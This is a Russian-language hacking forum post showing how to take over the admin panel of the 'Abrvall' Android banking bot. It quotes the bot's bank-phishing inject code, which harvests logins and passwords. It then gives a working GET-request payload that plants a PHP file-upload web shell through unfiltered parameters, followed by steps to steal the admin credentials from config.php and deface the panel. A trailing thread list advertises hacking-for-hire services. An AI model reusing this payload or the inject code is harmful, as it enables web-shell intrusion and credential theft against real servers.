Взлом ведроид бота Abrvall

Admin

Original poster

Administrator

24.01.2017

Давным-давно мне попался в руки сорц одного андроид-бота. И разумеется, сорц был проанализирован вдоль и поперек.
Автор бота - Conf, ныне в статусе кидалы. Поэтому, ломаем. Говорят, что автор бота умер. Но это не точно. Через день после блека деньги с бтц-кошеля вывели. Ну вы поняли...

Посмотрел я исходники и знаете, был весьма удивлен. Можно, конечно, говорить про XSS да SQL-инъекции (они были, разумеется). Но интереснее другое - в процессе анализа кода, я насчитал больше 20 способов заливки шелла.

В папочке inject лежит добротная кучка инжектов под банки, платежки и соцсети. Рассмотрим кусок кода одного из них (/inject/akbank/verify.php):

PHP:

<?

$acoount = "";

if(isset($_REQUEST["uniqid"])) {
    $uniqid = $_REQUEST["uniqid"];
    $acoount .= $uniqid."|";
}

if(isset($_REQUEST["packet"])) {
    $pack = $_REQUEST["packet"];
    //$acoount .= $pack."|";
    $acoount .= "www.akbank.com|";
}

if(isset($_REQUEST["email"])) {
    $email = $_REQUEST["email"];
    $acoount .= $email."|";
}

if(isset($_REQUEST["login"])) {
    $login = $_REQUEST["login"];
    $acoount .= $login."|";
}

if(isset($_REQUEST["password"])) {
    $passwed = $_REQUEST["password"];
    $acoount .= $passwed;
}

include_once("../../config.php");
$link = mysql_connect($mysql_host, $mysql_user, $mysql_pwd);
if (!$link) {
    die(mysql_close($link));
}
mysql_select_db($mysql_db) || die(mysql_close($link));
mysql_query("INSERT INTO stata (imei, carta) VALUES ('$uniqid', '') ON DUPLICATE KEY UPDATE imei = '" . $uniqid . "', carta = '1'") or die(mysql_close($link));
mysql_close($link);

file_put_contents("../tds/temp/".$uniqid, $acoount."\r\n", FILE_APPEND | LOCK_EX);
if(is_file("../../temp/needinject".$uniqid)) {
    unlink("../../temp/needinject".$uniqid);
}
file_put_contents("../../temp/stopinj".$uniqid, "");

Все здесь прекрасно - нет никакой фильтрации и сходу идет запись в файл.
И что еще прекраснее, в 23 папках лежит схожий verify.php с такими же багами:

Если этого мало, то в корне бота есть savephone.php, sendsms.php и comment.php с аналогичными багами (вдобавок надо только подделать реферер). Но вернемся к файлу verify.php. Льем заливалку GET-запросом:

Код:

http://abrvall/inject/akbank/verify.php?uniqid=312468399102471235.php&email=<form method=post enctype=multipart/form-data><input type=file name=file><input type=submit></form><?php if(is_uploaded_file($_FILES[file][tmp_name])) move_uploaded_file($_FILES[file][tmp_name], $_FILES[file][name]);?>

Переходим на заливалку:

Код:

http://abrvall/inject/tds/temp/312468399102471235.php

Еще пара манипуляций и шелл залит:

Читаем файл config.php в корне, тащим логин/пасс админа, заходим и оставляем доброе послание:

Можно, конечно, сделать что-то менее палевное и куда более веселое, но это уже на ваше усмотрение...

Автор	Заголовок	Раздел	Ответы	Дата
	Хакеры добрались до ИИ-трейдинга: взлом на $107 000	Новости в сети	0	20.03.2025
	Крупнейший взлом в истории криптовалют: с Bybit украдено $1,46 млрд	Новости в сети	1	22.02.2025
	Взлом, майнинг, выкуп: 5 хакеров придумали, как выжать из IT-гигантов все соки	Новости в сети	0	16.02.2025
	Беспрецедентный взлом заставил США признать полное поражение спецслужб	Новости в сети	0	06.01.2025
	Взлом без пароля: 8 новых уязвимостей угрожают корпоративным сетям	Новости в сети	0	12.12.2024
	Взлом ENGlobal Corporation: данные оборонки США в руках вымогателей	Новости в сети	0	04.12.2024
	Гениальный взлом: Wi-Fi соседей становится ключом к корпоративным сетям	Новости в сети	0	25.11.2024
	Интересно Взлом MSSQL	Полезные статьи	0	21.11.2024
	Взлом на подписке: создателю RedLine грозит 35 лет тюрьмы	Новости в сети	0	30.10.2024
	100 миллионов жертв: взлом Change Healthcare сотрясает мир	Новости в сети	0	25.10.2024
	Взлом тишины: RAMBO атакует самые защищенные системы за доли секунды	Новости в сети	0	09.09.2024
	Сертификат на взлом: хакерам предложат выйти из подполья в России	Новости в сети	0	22.08.2024
T	Без предоплаты! Взлом почты Mail.ru на заказ, взлом почты Рамблер, Взлом пароля Rambler.ru inbox.ru list.ru bk.ru internet.ru xmail.ru	Ищу работу. Предлагаю свои услуги.	0	07.07.2024
	Взлом Schneider Electric: Hunt3r Kill3rs берут в заложники энергосистемы Германии	Новости в сети	0	19.06.2024
	Взлом Dell: данные 49 млн клиентов оказались в сети	Новости в сети	0	13.05.2024
	Взлом ООН: 8Base наносит мощный удар по борцам с неравенством	Новости в сети	0	19.04.2024
	Инженер Amazon осужден за взлом и кражу $5 млн.	Новости в сети	0	15.04.2024
	Токены Discord нарасхват: взлом Top.gg обернулся кошмаром для разработчиков	Новости в сети	0	27.03.2024
	Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев	Новости в сети	0	01.02.2024
	Взлом KyberSwap: математика помогла хакеру украсть $47 млн	Новости в сети	0	27.11.2023
	Взлом криптобиржи Poloniex принёс ущерб в $100 млн.	Новости в сети	0	14.11.2023
	Ожидает оплаты ✅Взлом/доступ мессенджеров,соц.сетей,почт,сайтов \| Удаленный доступ \| Очистка КИ/Информации из сети⚡	Ищу работу. Предлагаю свои услуги.	1	14.11.2023
	70 миллионов или 10 терабайт информации: чем обернется взлом TSMC для мира микросхем?	Новости в сети	0	02.07.2023
	ЦБ России опроверг взлом систем украинскими хакерами	Новости в сети	1	04.11.2022
1	ВАйфай взлом	Вопросы и интересы	2	19.05.2022
W	Заказать услуги Хакера,Взлом на заказ от [email protected] взлом базы данных,удаленный доступ (telegram,Viber,Whatsapp,Gmail,vk.com,OK.ru) Если	Корзина	0	29.04.2022
V	ВЗЛОМ ЛЮБОЙ СЛОЖНОСТИ, ПОМОЩЬ ПРОГРАММИСТА	Корзина	0	18.04.2022
W	Заказать услуги Хакера,Доступ до БД сайтов,Взлом Сайтов,Взлом на заказ от [email protected] -решение проблем по взлому.	Корзина	0	23.03.2022
B	SERVICE HACKEP [email protected] Услуги Взлома на заказ,заказать услуги взлома,взлом на заказ,сервис взлома. 1. Взлом мессенджеров сообщений:	Корзина	0	08.02.2022
A	Закрыто Пробив, поиск, взлом, флуд: Украина UA\| EC \| USA	Корзина	1	18.12.2021
K	Взлом WiFi через Кали линукс с рут правами	Вопросы и интересы	3	23.11.2021
H	Услуги взлома: ВК, WhatsApp, Viber, Instagram / E-mail / Взлом сайтов	Корзина	0	15.11.2021
A	Пробив, взлом , диверсия Украина UA	Ищу работу. Предлагаю свои услуги.	2	09.11.2021
T	Честный взлом почты mail.ru на заказ за 20$, взлом корпоративной почты, rambler Ukr.net Yahoo	Ищу работу. Предлагаю свои услуги.	0	28.10.2021
A	ВЗЛОМ БАНКОВ В БРАЗИЛИИ !!!!!!!	Предоставляю работу. Ищу специалиста.	0	19.10.2021
L	Взлом ВКонтакте на заказ от Фантомаса	Ищу работу. Предлагаю свои услуги.	4	21.08.2021
B	Взлом электронной почты, без предоплаты.	Ищу работу. Предлагаю свои услуги.	0	22.06.2021
C	Сервис по взлому-услуги хакера-заказать взлом на Заказ в [email protected] - Услуги Хакера. Приветствую участников форума! Станьте королем момента	Ищу работу. Предлагаю свои услуги.	0	18.06.2021
L	Интересно Взлом мастер пароля firefox (key4.db)	Бруты/Парсеры/Чекеры	0	06.06.2021
A	HackTheBox - взлом виртуальных машинын Omni и Доктор	Полезные статьи	0	19.01.2021
T	Нужен взлом Київстар(україна)	Предоставляю работу. Ищу специалиста.	1	16.01.2021
D	Оптовый взлом почты на заказ (цена 20$) Взлом почты Mail.ru Yandex.ru Rambler.ru	Ищу работу. Предлагаю свои услуги.	0	13.01.2021
A	Интересно HackTheBox - взлом виртуальной машины Tabby	Полезные статьи	0	26.11.2020
H	Аппаратный взлом жёсткого диска	Корзина	0	16.11.2020
W	Интересно Массовый взлом роутеров.	Уязвимости и взлом	2	03.11.2020
A	Интересно HackTheBox - взлом виртуальной машины Blunder	Полезные статьи	1	28.10.2020
V	Взлом\|Hack\|HackMessenger\|соц сети мессенджеры почты	Корзина	0	14.10.2020
	Интересно Взлом Wrapped LEO на сумму $42 000	Новости в сети	0	14.10.2020
	Интересно Слив видеокурса ВЗЛОМ 4-В-1 2020 [exelab]	Уязвимости и взлом	13	13.10.2020
H	Взлом без предоплат писать на [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Пишите на поч	Корзина	0	03.10.2020

Хакеры добрались до ИИ-трейдинга: взлом на $107 000

Взлом ведроид бота Abrvall

Admin

Название темы